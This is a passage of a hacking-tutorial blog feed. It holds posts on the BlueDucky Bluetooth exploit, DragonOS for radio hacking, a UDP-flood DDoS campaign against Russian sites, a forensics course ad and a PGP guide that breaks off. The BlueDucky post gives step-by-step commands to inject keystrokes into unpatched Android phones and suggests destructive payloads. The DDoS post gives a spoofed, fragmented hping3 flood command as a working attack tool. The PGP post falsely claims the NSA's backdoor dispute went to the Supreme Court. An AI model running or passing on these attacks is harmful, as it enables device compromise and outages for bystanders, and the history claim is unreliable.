  259. <p>There are numerous classes of Bluetooth devices. These different classes are announced to the connecting device in the banner. In previous Bluetooth tutorials here, we have discussed probably the most important class for exploiting Bluetooth devices, the HID class. This class of devices are known as Human Interface Devices and include such things as Bluetooth mice and keyboards. These are the devices that are allowed to send inputs to the Bluetooth-enabled device necessary for keyboards and mice to function properly.</p>
  260. <p><br /></p>
  261. <p>In 2023, a new vulnerability was discovered in Bluetooth that may allow an unauthenticated HID Device to initiate and establish an encrypted connection. If this happens, the HID device may be able to inject commands into the device. This exploit works against unpatched Android 11 and later devices and any Android 10 and earlier device,  as there is no patch presently available for these devices. A Proof Of Concept or POC was released in January 2024 and was recently integrated into a new tool known as BlueDucky.</p>
  262. <p><br /></p>
  263. <p>Let&apos;s take a look at this tool and see what it can do.</p>
  264. <p><br /></p>
  265. <p><br /></p>
  266. <h2><strong>Step</strong><span style="color: #292f33;"><strong> </strong></span><span style="color: #0D12E9;"><strong># 1</strong></span><span style="color: #292f33;"><strong> </strong></span><strong>Download and Install BlueDucky</strong></h2>
  267. <p><br /></p>
  268. <p>To install BlueDucky, we need to do a few things to get our system ready.</p>
  269. <p><br /></p>
  270. <p>First, update your apt cache.</p>
  271. <p><br /></p>
  272. <p><strong> kali &gt; sudo apt update   </strong></p>
  273. <p><br /></p>
  274. <p>Next, install the necessary dependencies from the Kali repository.</p>
  275. <p><br /></p>
  276. <p><strong>kali &gt; sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus</strong></p>
  277. <p><br /></p>
  278. <p>We n0w need to get bluez from <u><a href="http://github.com" target="_blank"><span style="color: #0D12E9;">github.com</span></a></u>. If you have done my previous tutorials on bluetooth, you likely already have this.</p>
  279. <p><br /></p>
  280. <p><strong>kali &gt;  git clone </strong><u><a href="https://github.com/pybluez/pybluez.git" target="_blank"><span style="color: #0D12E9;"><strong>https://github.com/pybluez/pybluez.git</strong></span></a></u></p>
  281. <p><br /></p>
  282. <p>Now, move into the new directory, pybluez.</p>
  283. <p><br /></p>
  284. <p><strong>kali &gt; cd pybluez</strong></p>
  285. <p><br /></p>
  286. <p>We now need to run the setup script for bluez</p>
  287. <p><br /></p>
  288. <p><strong>kali &gt; </strong><u><strong>python3</strong></u><u><a href="http://python3setup.py" target="_blank"><strong> </strong></a></u><u><a href="http://setup.py" target="_blank"><span style="color: #0D12E9;"><strong>setup.py</strong></span></a></u><strong> install</strong></p>
  289. <p><br /></p>
  290. <p>Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.</p>
  291. <p><br /></p>
  292. <p><strong>kali &gt; cd ~</strong></p>
  293. <p><br /></p>
  294. <p><strong>kali &gt; git clone --depth=1 https://github.com/bluez/bluez.git </strong></p>
  295. <p><br /></p>
  296. <p><strong>kali &gt; gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I  ~/bluez -lbluetooth</strong></p>
  297. <p><br /></p>
  298. <p>Now, let copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).</p>
  299. <p><br /></p>
  300. <p><strong>kali &gt; sudo cp bdaddr /usr/local/bin</strong></p>
  301. <p><br /></p>
  302. <p>Finally, we should download BlueDucky from github.</p>
  303. <p><br /></p>
  304. <p><strong>kali &gt; git clone </strong><u><a href="https://github.com/pentestfunctions/BlueDucky.git" target="_blank"><span style="color: #0D12E9;"><strong>https://github.com/pentestfunctions/BlueDucky.git</strong></span></a></u></p>
  305. <p><br /></p>
  306. <p><strong>kali &gt; cd BlueDucky</strong></p>
  307. <p><br /></p>
  308. <p><strong>kali &gt; sudo hciconfig hci0 up</strong></p>
  309. <p><br /></p>
  310. <h2><strong>Step # 2  Run BlueDucky</strong></h2>
  311. <p><br /></p>
  312. <p>Now that we have all of the elements necessary to run BlueDucky installed, let&apos;s try running it. If you are running it from a system with an external plug-in bluetooth adapter as I am, you will likely need to make a small change to the python script. BlueDucky, by default, uses hci0 to scan for Bluetooth devices. If you added an external bluetooth device, it will likely be recognized as hci1. We can remedy this by simply opening the script in your favorite text editor and changing the default value to hci1. Here I have used the default GUI text editor in Kali, mousepad.</p>
  313. <p><br /></p>
  314. <p>kali &gt; sudo mousepad <u><a href="http://BlueDucky.py" target="_blank"><span style="color: #0D12E9;">BlueDucky.py</span></a></u></p>
  315. <p><br /></p>
  316. <p><br /></p>
  317. <figure><img src="https://static.wixstatic.com/media/6a4a49_03ae1c4d249e4e99aaefe96596d34784~mv2.png/v1/fit/w_643,h_486,al_c,q_80/file.png"></figure>
  318. <p><br /></p>
  319. <p>Now, go ahead and save this file. Make certain to give yourself execute permissions.</p>
  320. <p><br /></p>
  321. <p><strong>kali &gt; sudo chmod 755</strong><span style="color: #0D12E9;"><strong> </strong></span><u><a href="http://BlueDucky.py" target="_blank"><span style="color: #0D12E9;"><strong>BlueDucky.py</strong></span></a></u></p>
  322. <p><br /></p>
  323. <p>It&apos;s a good idea now to check to make certain your bluetooth adapter is up and activated.</p>
  324. <p><br /></p>
  325. <p><strong>kali &gt; hciconfig hci1 up</strong></p>
  326. <p><br /></p>
  327. <p>If your adapter is up and running, it&apos;s time to start BlueDucky!</p>
  328. <p><br /></p>
  329. <p>kali &gt; sudo python3<span style="color: #0D12E9;"> </span><u><a href="http://BlueDucky.py" target="_blank"><span style="color: #0D12E9;">BlueDucky.py</span></a></u></p>
  330. <p><br /></p>
  331. <p><br /></p>
  332. <figure><img src="https://static.wixstatic.com/media/6a4a49_3682ed1e4500480dbb7db9799c2aa629~mv2.png/v1/fit/w_593,h_600,al_c,q_80/file.png"></figure>
  333. <p><br /></p>
  334. <p>If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.</p>
  335. <p><br /></p>
  336. <p><br /></p>
  337. <p><br /></p>
  338. <figure><img src="https://static.wixstatic.com/media/6a4a49_77ee0c418edc4a61937fc851c6bf0e56~mv2.png/v1/fit/w_513,h_127,al_c,q_80/file.png"></figure>
  339. <p><br /></p>
  340. <p>At this point, you can select &quot;yes&quot;and enter the MAC address of the target device.</p>
  341. <p><br /></p>
  342. <p>When you do so, BlueDucky will run through the requisite commands to compromise the device and if successful, will inject a &quot;hello there 123&quot; to the target device.</p>
  343. <p><br /></p>
  344. <figure><img src="https://static.wixstatic.com/media/6a4a49_b1588b454201464495c7294b0daa13f3~mv2.png/v1/fit/w_725,h_539,al_c,q_80/file.png"></figure>
  345. <p><br /></p>
  346. <p><br /></p>
  347. <h2><strong>Summary</strong></h2>
  348. <p><br /></p>
  349. <p>Bluetooth enabled devices are all around us in our everyday life. These includes phones, tablets, speakers, headsets, keyboards and many other devices. Bluetooth devices declare the type of the device they are before pairing with another device. This is the class of the device. This class declaration can be manipulated by an attacker to inject commands into the device.</p>
  350. <p><br /></p>
  351. <p>BlueDucky is an automated tool for exploiting this vulnerability and although the tool only sends an innocuous message to the target, it can easily be altered to send malicious commands into the target device such as &quot;shutdown&quot; or &quot;rm -rf&quot;.</p>
  352. <p><br /></p>
  353. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[SDR for Hackers: The DragonOS for Software Defined Radio]]></title><description><![CDATA[Welcome back, my aspiring radio hackers! Radio hacking using inexpensive SDR's is the state-of-the art in hacking. So many communication...]]></description><link>https://www.hackers-arise.com/post/sdr-for-hackers-the-dragonos-for-software-defined-radio</link><guid isPermaLink="false">63a32802c6b54ad327ac5506</guid><pubDate>Thu, 15 Feb 2024 22:45:39 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_b163e1b98ee24354baafabac329164dc~mv2.png/v1/fit/w_1000,h_826,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring radio hackers!</p>
  354. <p><br /></p>
  355. <p>Radio hacking using inexpensive SDR&apos;s is the state-of-the art in hacking. So many communication mediums using radio waves that the list could fill this tutorial but a few include;</p>
  356. <p><br /></p>
  357. <ol>
  358.  <li><p>Bluetooth</p></li>
  359.  <li><p>Cellular phones</p></li>
  360.  <li><p>Satellite phones</p></li>
  361.  <li><p>Wi-Fi</p></li>
  362.  <li><p>National defense and Police radio</p></li>
  363.  <li><p>Satellite communication</p></li>
  364.  <li><p>Remote controls</p></li>
  365.  <li><p>GPS</p></li>
  366.  <li><p>NFC</p></li>
  367.  <li><p>Automobile key fobs</p></li>
  368. </ol>
  369. <p><br /></p>
  370. <p><br /></p>
  371. <p>...the list could go on and on.</p>
  372. <p><br /></p>
  373. <p>Many of the tools in this field are open-source with a significant list of dependencies. This can mean hours of downloading and configuring applications and dependencies. Thankfully, we now have a operating system with nearly all the applications and dependencies pre-installed!</p>
  374. <p><br /></p>
  375. <h2><strong>DragonOS</strong></h2>
  376. <p><br /></p>
  377. <p>DragonOS is a custom Linux distribution designed for software-defined radio (SDR) enthusiasts and professionals. It comes pre-installed with a wide range of tools and software for SDR, such as GNU Radio, GQRX, and various other utilities for capturing, analyzing, and manipulating radio signals. DragonOS aims to provide a ready-to-use environment for SDR experimentation and research, without the need for extensive setup and configuration.</p>
  378. <p><br /></p>
  379. <p>DragonOS is built upon Lubuntu, a fork of the Ubuntu Linux distribution.</p>
  380. <h2></h2>
  381. <h2><span style="color: #292f33;">Step 1: Downloading and Installing Dragon OS</span></h2>
  382. <p><br /></p>
  383. <p>DragonOS can be downloaded from Sourceforge at the following URL.</p>
  384. <p><br /></p>
  385. <p><a href="https://sourceforge.net/projects/dragonos-focal/" target="_blank"><span style="color: #0D12E9;">https://sourceforge.net/projects/dragonos-focal/</span></a></p>
  386. <p><br /></p>
  387. <p>Once the ISO download is complete, you can either install it on your baremetal computer or a virtual machine such Oracle&apos;s VirtualBox. When it is complete, it should look like the screenshot below.</p>
  388. <p><br /></p>
  389. <p><br /></p>
  390. <figure><img src="https://static.wixstatic.com/media/6a4a49_b163e1b98ee24354baafabac329164dc~mv2.png/v1/fit/w_1000,h_826,al_c,q_80/file.png"></figure>
  391. <p><br /></p>
  392. <p><br /></p>
  393. <p><br /></p>
  394. <h2>Step#2 Navigating Dragon OS</h2>
  395. <p><br /></p>
  396. <p>DragonOS has a large number of SDR tools built-in. Most of these are already compiled and ready to use. Most importantly, many of the tools use specialized libraries for their functioning and these are installed as well (you can do all this yourself on you Ubuntu or Debian distribution but it can take many frustating hours).</p>
  397. <p><br /></p>
  398. <p>The tools are available in two places on the menu system;</p>
  399. <p><br /></p>
  400. <ol>
  401.  <li><p>Other</p></li>
  402.  <li><p>Hamradio</p></li>
  403. </ol>
  404. <p><br /></p>
  405. <p>When we navigate to the menu items, you can see the expanded list of SDR tools.</p>
  406. <p><br /></p>
  407. <p><br /></p>
  408. <figure><img src="https://static.wixstatic.com/media/6a4a49_e727d91e7a9646b3a528b8213df64f85~mv2.png/v1/fit/w_716,h_767,al_c,q_80/file.png"></figure>
  409. <p><br /></p>
  410. <p><br /></p>
  411. <figure><img src="https://static.wixstatic.com/media/6a4a49_7c09de4ddd15446a88cc2f5e68a267a2~mv2.png/v1/fit/w_654,h_787,al_c,q_80/file.png"></figure>
  412. <p><br /></p>
  413. <p>Just like other Ubuntu and Debian distributions, you can open a terminal and run the tools from a command-line. Nearly all of the tools are located at the /usr/src directory.</p>
  414. <p><br /></p>
  415. <p>To see all of the software in one place, navigate to /usr/src such as;</p>
  416. <p><br /></p>
  417. <p><strong>live &gt; cd /usr/src</strong></p>
  418. <p><br /></p>
  419. <p><strong>live &gt; ls </strong></p>
  420. <p><br /></p>
  421. <figure><img src="https://static.wixstatic.com/media/6a4a49_12abbff615cf42b6b2971e586ee03238~mv2.png/v1/fit/w_543,h_654,al_c,q_80/file.png"></figure>
  422. <p><br /></p>
  423. <p><br /></p>
  424. <h2>Summary</h2>
  425. <p><br /></p>
  426. <p>DragonOS is the ideal operating system for working Software Defined Radio! It&apos;s built upon Lubuntu giving us all the capabilities of a well-known Linux distribition with hundreds of tools built-in with all their dependencies. This makes SDR Hacking so much easier.</p>
  427. <p><br /></p>
  428. <p>For more tutorials on SDR for Hackers,<span style="color: #0D12E9;"> </span><u><a href="https://www.hackers-arise.com/sdr-for-hackers" rel="noreferrer" target="_blank"><span style="color: #0D12E9;">click here.</span></a></u></p>
  429. <p><br /></p>
  430. <p>We will be using this Linux distribution throughout all of SDR Hacking courses including;</p>
  431. <p><br /></p>
  432. <ol>
  433.  <li><p>SDR for Hackers</p></li>
  434.  <li><p>Advanced SDR for Hackers</p></li>
  435.  <li><p>Satellite Hacking</p></li>
  436.  <li><p>Car Hacking and more!</p></li>
  437. </ol>]]></content:encoded></item><item><title><![CDATA[DDoS Attacks: Flooding Russian Sites with Fragmented UDP Packets]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! At the beginning of the cyberwar between Russia and Ukraine, Hackers-Arise, the IT Army of...]]></description><link>https://www.hackers-arise.com/post/ddos-attacks-flooding-russian-sites-with-fragmented-udp-packets</link><guid isPermaLink="false">655286393b6bb49a8f28da4f</guid><pubDate>Mon, 27 Nov 2023 22:05:51 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_78d8513669bf439788e127d9dc17959d~mv2.png/v1/fit/w_718,h_152,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
  438. <p><br /></p>
  439. <p>At the beginning of the cyberwar between Russia and Ukraine, Hackers-Arise, the IT Army of Ukraine and over 17,000 hackers around the world (this is the Russian estimate. we believe it is much higher)set out to make Russia&apos;s digital assets unavailable. In this way, the Russians would not be able communicate via their websites, operate their military, or run their commercial operations. We targeted the following websites below within Russia. This is an example of the classic Distributed Denial of Service (DDoS) attacks.</p>
  440. <p><br /></p>
  441. <p><br /></p>
  442. <figure><img src="https://static.wixstatic.com/media/6a4a49_fa7e8e0768c041a781aadb02fdd0f17e~mv2.png/v1/fit/w_589,h_889,al_c,q_80/file.png"></figure>
  443. <p><br /></p>
  444. <p><br /></p>
  445. <p>One of things we did a little differently was to use UDP packets rather than TCP packets. UDP attacks can be much more effective for DDoS, as we will see. According to DDoS protection companies such as Radware and Akamai, this was the most common type of DDoS attack in 2023 accounting for nearly 2/3 of all attacks.</p>
  446. <p><br /></p>
  447. <p>A UDP flood attack is a type of Distributed Denial of Service (DDoS) attack where the attacker overwhelms a target server with User Datagram Protocol (UDP) packets. The aim is to either consume network resources to the point where the target can no longer handle legitimate traffic or to exploit vulnerabilities in the UDP protocol to cause the server to respond with even more traffic, amplifying the attack. </p>
  448. <p><br /></p>
  449. <p>Here&apos;s a bit more detail about how it works and its impact:</p>
  450. <p><br /></p>
  451. <h2><strong>Understanding UDP</strong></h2>
  452. <ol>
  453.  <li><p><strong>UDP Characteristics</strong>: UDP is a connectionless protocol, which means it doesn&apos;t require a handshake to set up a connection before data is sent. This makes UDP faster than TCP (Transmission Control Protocol), but less reliable in terms of ensuring data integrity and delivery.</p></li>
  454.  <li><p><strong>No Connection Verification</strong>: Because there&apos;s no connection verification in UDP, an attacker can send packets to random ports on a target server with a spoofed IP address (the source IP address is faked).</p></li>
  455. </ol>
  456. <h2><strong>Mechanism of UDP Flood Attack</strong></h2>
  457. <ol>
  458.  <li><p><strong>High Volume of Requests</strong>: The attacker sends a large number of UDP packets to random ports on the target server.</p></li>
  459.  <li><p><strong>Server Responses</strong>: For each packet, the server checks for an application listening at that port. When no application is found, the server responds with a &apos;Destination Unreachable&apos; packet.</p></li>
  460.  <li><p><strong>Network Saturation</strong>: This flood of incoming UDP packets and outgoing &apos;Destination Unreachable&apos; responses can saturate the network bandwidth and resources of the server, making it incapable of processing legitimate requests.</p></li>
  461.  <li><p><strong>Amplification</strong>: Some UDP flood attacks use amplification techniques, where the attacker sends a packet to a third-party server (like a DNS server), forging the sender&apos;s IP address to that of the victim. The third-party server then sends a large response to the victim, amplifying the amount of data directed at the target.</p></li>
  462. </ol>
  463. <p>In addition, in UDP flood attacks the packets can be fragmented or otherwise malformed resulting in an even faster packets-per-second rate and cause some network cards to fail.</p>
  464. <p><br /></p>
  465. <p>We can duplicate this attack with our trusty Kali and the tool known as the &quot;packet-crafting&quot; tool for its versatility, <strong>hping3</strong>.</p>
  466. <p><br /></p>
  467. <p><br /></p>
  468. <h2><strong>Step #1: How hping3 works</strong></h2>
  469. <p><br /></p>
  470. <p>hping3 is a tremendous and simple tool for network and port scanning. One of its beauties is its ability to create just about any type of packet. Most technologies that interact with the internet create standard packets that are compliant with the RFC&apos;s that govern the Internet. As hackers,  we are not limited by those RFC&apos;s.</p>
  471. <p><br /></p>
  472. <p>hping3&apos;s ability to create just about any type of packets  can be especially useful in crafting an attack to get past security devices such as IDS&apos;s and firewall. It can also be an excellent DDoS too.</p>
  473. <p><br /></p>
  474. <p>Let&apos;s begin by looking at the help screen for hping3.</p>
  475. <p><br /></p>
  476. <p><strong>kali &gt; hping3 -h</strong></p>
  477. <p><br /></p>
  478. <p><br /></p>
  479. <figure><img src="https://static.wixstatic.com/media/6a4a49_9877002905e74b96bd3d77954ac2f733~mv2.png/v1/fit/w_617,h_524,al_c,q_80/file.png"></figure>
  480. <p><br /></p>
  481. <p><br /></p>
  482. <figure><img src="https://static.wixstatic.com/media/6a4a49_3b4c9efe352041d7a84af7750bb0f204~mv2.png/v1/fit/w_616,h_621,al_c,q_80/file.png"></figure>
  483. <p><br /></p>
  484. <p><br /></p>
  485. <figure><img src="https://static.wixstatic.com/media/6a4a49_101a91af45b04df990ffa21bfe83a423~mv2.png/v1/fit/w_627,h_313,al_c,q_80/file.png"></figure>
  486. <p><br /></p>
  487. <h2><strong>Step #2: Standard Port Scan</strong></h2>
  488. <p><br /></p>
  489. <p>Let&apos;s begin by doing a standard port scan with hping3. Like nmap, hping3 is able to determine whether a port is open on the target server but the results are a little more difficult to interpret.</p>
  490. <p><br /></p>
  491. <p>We can do a port scan with hping3 by simply using the -S option and IP address of the target such as;</p>
  492. <p><br /></p>
  493. <p><strong>kali &gt; sudo hping3 -S 192.168.107.150</strong></p>
  494. <p><br /></p>
  495. <p><br /></p>
  496. <figure><img src="https://static.wixstatic.com/media/6a4a49_48da586cbf2f4dc3a274e8c1df231a35~mv2.png/v1/fit/w_1000,h_388,al_c,q_80/file.png"></figure>
  497. <p><br /></p>
  498. <p>Notice that hping3, without any other options simple scan port 0 (sport=0) and the target response is flags=RA. When the packet responds with the R (reset) flag, that means the port is closed.</p>
  499. <p><br /></p>
  500. <p>To scan a particular port with hping3, you can append the scan command with a -p and the port number such as -p 80.</p>
  501. <p><br /></p>
  502. <p><strong>kali &gt; sudo hping3 -S 192.168.107.150 -p 80</strong></p>
  503. <p><br /></p>
  504. <p><br /></p>
  505. <figure><img src="https://static.wixstatic.com/media/6a4a49_1d70822ef42c4d05b0d7cbec875e32a2~mv2.png/v1/fit/w_1000,h_337,al_c,q_80/file.png"></figure>
  506. <p><br /></p>
  507. <p><br /></p>
  508. <p><br /></p>
  509. <h2><strong>Step #3: UDP Flood with fragmented packet s and spoofed IP address</strong></h2>
  510. <p><br /></p>
  511. <p>Now, to use hping3 as an effective DDoS tool, we need to send a flood of fragmented UDP packets from a spoofed IP address. We do this with the following command;</p>
  512. <p><br /></p>
  513. <p><strong>kali&gt; sudo hping3 -S --udp --flood -f --spoof 192.168.107.101 192.168.107.152</strong></p>
  514. <p><br /></p>
  515. <figure><img src="https://static.wixstatic.com/media/6a4a49_78d8513669bf439788e127d9dc17959d~mv2.png/v1/fit/w_718,h_152,al_c,q_80/file.png"></figure>
  516. <p><br /></p>
  517. <p><br /></p>
  518. <p><strong>Where:</strong></p>
  519. <p><br /></p>
  520. <p>hping3 is the command</p>
  521. <p><br /></p>
  522. <p>-S option means scan</p>
  523. <p><br /></p>
  524. <p>--udp means send UDP packets</p>
  525. <p><br /></p>
  526. <p>-f option means fragment the packets</p>
  527. <p><br /></p>
  528. <p>--spoof means use the following IP address as the sender IP</p>
  529. <p><br /></p>
  530. <p><br /></p>
  531. <h2><strong>Summary</strong></h2>
  532. <p><br /></p>
  533. <p>Despite years of technological security advances in DDoS protection, a simple tool such as hping3 with a little savvy and knowledge can still have devastating effects on the availability of websites and services. When a tool like hping3 is delivered to thousands are even millions of IoT devices and targeted to one IP address, there is little that can done to stop it&apos;s devastating effects.</p>
  534. <p><br /></p>
  535. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Hackers-Arise Announces a New Training Program: Digital Forensics and Incident Response (DFIR)!]]></title><description><![CDATA[Many of our aspiring cyberwarriors have been asking for a separate digital forensics and incident response (DFIR) training program and we...]]></description><link>https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir</link><guid isPermaLink="false">654e92f04a3befe2a0645b02</guid><pubDate>Fri, 10 Nov 2023 20:46:17 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_ae7b90a8fde348f5a26f405f9110af2b~mv2.png/v1/fit/w_1000,h_679,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Many of our aspiring cyberwarriors have been asking for a separate digital forensics and incident response (DFIR) training program and we have responded!</p>
  536. <p><br /></p>
  537. <p><br /></p>
  538. <figure><img src="https://static.wixstatic.com/media/6a4a49_ae7b90a8fde348f5a26f405f9110af2b~mv2.png/v1/fit/w_1000,h_679,al_c,q_80/file.png"></figure>
  539. <p><br /></p>
  540. <p><br /></p>
  541. <p>This new program will use many of the existing courses on our Subscriber and Subscriber Pro platform and add additional, new courses specifically for digital forensics and incident response. We recognize that not everyone in cybersecurity wants to become a hacker/penetration tester and many of you will choose a career in protecting an institution&apos;s resources. This career has excellent job security (hacks will not stop any time soon) and excellent pay and benefits.</p>
  542. <p><br /></p>
  543. <p>Between now and the beginning 2024, you can now join this 3 year program at an introductory price $1500 until March 1 ($2000 after)!</p>
  544. <p><br /></p>
  545. <p>This program will contain the following courses;</p>
  546. <p><br /></p>
  547. <ol>
  548.  <li><p>Digital Forensics</p></li>
  549.  <li><p>Advanced Digital Forensics</p></li>
  550.  <li><p>OSINT</p></li>
  551.  <li><p>Bitcoin Forensics</p></li>
  552.  <li><p>Cyber Law</p></li>
  553.  <li><p>Criminal Law</p></li>
  554.  <li><p>Incident Response</p></li>
  555.  <li><p>Threat Intelligence</p></li>
  556.  <li><p>Cloud Security and Incident Response</p></li>
  557.  <li><p> Anti-Forensics</p></li>
  558.  <li><p> Network Forensics</p></li>
  559.  <li><p> Memory Forensics</p></li>
  560.  <li><p> SCADA/ICS Forensics</p></li>
  561.  <li><p> Snort</p></li>
  562.  <li><p> Splunk</p></li>
  563.  <li><p>Reverse Engineering Malware</p></li>
  564. </ol>
  565. <p><br /></p>
  566. <p>For more information, <u><a href="https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir" target="_blank"><span style="color: #0D12E9;">https://www.hackers-arise.com/post/hackers-arise-announces-a-new-training-program-digital-forensics-and-incident-response-dfir</span></a></u><span style="color: #0D12E9;"> or </span>email hackers-arise@protonmail.com.</p>]]></content:encoded></item><item><title><![CDATA[Getting Started with PGP for email]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Pretty Good Privacy or PGP has been around for over 30 years and has proven that it is pretty...]]></description><link>https://www.hackers-arise.com/post/getting-started-with-pgp-for-email</link><guid isPermaLink="false">654be53c371c43c4071903bb</guid><pubDate>Fri, 10 Nov 2023 15:40:00 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_551d40bf7ea54621ab5c2e7b271c910e~mv2.png/v1/fit/w_250,h_250,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
  567. <p><br /></p>
  568. <p>Pretty Good Privacy or PGP has been around for over 30 years and has proven that it is pretty good! PGP is used in many different environments but most widely in email.</p>
  569. <p><br /></p>
  570. <p>The most common use for PGP  is to enable people  to confidentially send messages and data to each other using a  combination of their public and private keys (PKI). It is often used to  encrypt and decrypt emails, files, text messages, and entire disk  partitions, and to authenticate digital certificates. </p>
  571. <p>
  572. PGP can also used to authenticate messages and check for integrity. It can detect whether a message has been altered after it was written and  whether it was sent by the person who claims to have sent it. PGP creates a digital  signature for private and public keys to prove that a sender is the  rightful owner of the message.</p>
  573. <p><br /></p>
  574. <p><br /></p>
  575. <figure><img src="https://static.wixstatic.com/media/6a4a49_551d40bf7ea54621ab5c2e7b271c910e~mv2.png/v1/fit/w_250,h_250,al_c,q_80/file.png"></figure>
  576. <p><br /></p>
  577. <p>
  578. PGP can also be used to confirm that a message reaches the intended  recipient. A user’s public key can be distributed in an identity  certificate, which is constructed to ensure that tampering is easily  detected. PGP products can also confirm whether a certificate belongs to  someone, also known as the web of trust concept.</p>
  579. <p><br /></p>
  580. <p>In this tutorial, Aircorridor will show you how to use OpenPGP in a Tails OS environment to keep your emails pretty private.</p>
  581. <p><br /></p>
  582. <h2><strong>What is OpenPGP?</strong></h2>
  583. <h2></h2>
  584. <p style="text-align: left;">OpenPGP (also known as <a href="https://www.openpgp.org/about/" target="_blank"><span style="color: #0D12E9;">Open-Source PGP</span></a>) was created by one of the PGP’s inventors, Phil Zimmerman, to overcome the patent restrictions that were preventing PGP&apos;s wide use. First developed as freeware in 1991, PGP encryption later became proprietary software and is now owned by Symantec. </p>
  585. <p><br /></p>
  586. <p style="text-align: left;">One of the interesting developments in the history of PGP was the NSA challenge to PGP. Soon after Zimmerman released PGP, the NSA demanded a backdoor. To his credit, Zimmerman refused (the NSA asks for backdoors to all encryption schemes and believes they are entitled to them). The case went all the way to the U.S. Supreme Court before the NSA dropped the case. Many have speculated on why they dropped case after many years, but people believe one or the other motivated them;</p>
  587. <p><br /></p>
  588. <ol>
  589.  <li><p style="text-align: left;">The NSA developed their own backdoor and no longer needed Zimmerman to grant them one</p></li>
  590.  <li><p style="text-align: left;">The NSA feared they would lose the case and would no longer be automatically granted backdoors to all encryption schemes.</p></li>
  591. </ol>
  592. <p><br /></p>
  593. <p style="text-align: left;">Zimmermann  shared the message format for PGP with the wider community. Based on this, the OpenPGP standard was created in 1997, enabling anyone to write implementations that are compatible with other software that uses OpenPGP.</p>
  594. <h2></h2>
  595. <h2><strong>How does PGP work?</strong></h2>
  596. <h2></h2>
  597. <p>PGP combines data compression, password hashing, symmetric-key cryptography, and public-key cryptography to keep sensitive data secure. Let&apos;s imagine a scenario where John wants to send a private message to his friend Dave. PGP generates a public key and a private key for Dave, known as a key pair. These public and private keys are strings of bytes representing numbers that are mathematically related.</p>
  598. <p><br /></p>
  599. <p>Dave can share his public key with anyone he wants. This key is like a lock that can only be opened with his private key. So, anyone can use his public key to send secret messages, but only Dave can unlock and read them with his private key.</p>
  600. <p><br /></p>
  601. <p><br /></p>
  602. <p style="text-align: left;">So when John writes to Dave: </p>
  603. <p style="text-align: left;"> </p>
  604. <p style="text-align: left;">1. John uses Dave’s public key to encrypt his message into ciphertext – seemingly random characters that can’t be read.</p>
  605. <p><br /></p>
  606. <p style="text-align: left;">2. John sends the message. Anyone who tries to read it in transit, like email providers, spies, or hackers, will only see unreadable ciphertext.</p>
  607. <p><br /></p>
  608. <p style="text-align: left;">3. Dave receives the message and uses his private key to decrypt the message into readable plaintext.</p>
  609. <p><br /></p>
  610. <p style="text-align: left;">4. To reply, Dave repeats the process using John’s public key. Only John can read it by decrypting it with his private key.</p>
  611. <p><br /></p>
  612. <p><br /></p>
  613. <figure><img src="https://static.wixstatic.com/media/6a4a49_d28e47aff9844f35826ad32df7c8c59b~mv2.png/v1/fit/w_675,h_550,al_c,q_80/file.png"></figure>
  614. <p><br /></p>
  615. <p style="text-align: left;"><strong> </strong>
  616. </p>
  617. <h2><strong>How to use PGP on Tails OS</strong></h2>
  618. <h2></h2>
  619. <p><strong>Step #1: Create a Pair of Keys</strong></p>
  620. <p><strong> </strong>
  621. To receive messages, you have to create a pair of Public/Private keys. To do so, open Kleopatra from the application menu.</p>
  622. <p><br /></p>
  623. <p><br /></p>
  624. <figure><img src="https://static.wixstatic.com/media/6a4a49_fb53b656b23546abb1e6462b18b195a5~mv2.png/v1/fit/w_499,h_433,al_c,q_80/file.png"></figure>
  625. <p><br /></p>
  626. <figure><img src="https://static.wixstatic.com/media/6a4a49_5a5016e9532a4bdabfe4d50641d64c73~mv2.png/v1/fit/w_1000,h_526,al_c,q_80/file.png"></figure>
  627. <p><br /></p>
  628. <p>
  629. Switch to the “Create a personal OpenPGP key pair”. </p>
  630. <p><br /></p>
  631. <p><br /></p>
  632. <figure><img src="https://static.wixstatic.com/media/6a4a49_7048a1d76c574334ae442f10d34a0d0c~mv2.png/v1/fit/w_497,h_392,al_c,q_80/file.png"></figure>
  633. <p><br /></p>
  634. <p>
  635. </p>
  636. <p>You can choose any name and email address. To change key strength and other settings click “Advanced Settings”.</p>
  637. <p><br /></p>
  638. <p><br /></p>
  639. <figure><img src="https://static.wixstatic.com/media/6a4a49_7e8640a6ebf5413bac31522ec4d577a1~mv2.png/v1/fit/w_494,h_388,al_c,q_80/file.png"></figure>
  640. <p>As you can see below, you can designate various encryption schemes or varying strength.</p>
  641. <figure><img src="https://static.wixstatic.com/media/6a4a49_9455098bb68043498e26b717a71c6fa3~mv2.png/v1/fit/w_368,h_569,al_c,q_80/file.png"></figure>
  642. <p><br /></p>
  643. <p><br /></p>
  644. <p>Next, choose who would sign this cipher and for whom to encrypt it and click “Sign/Encrypt Notepad”.</p>
  645. <p><br /></p>
  646. <p><br /></p>
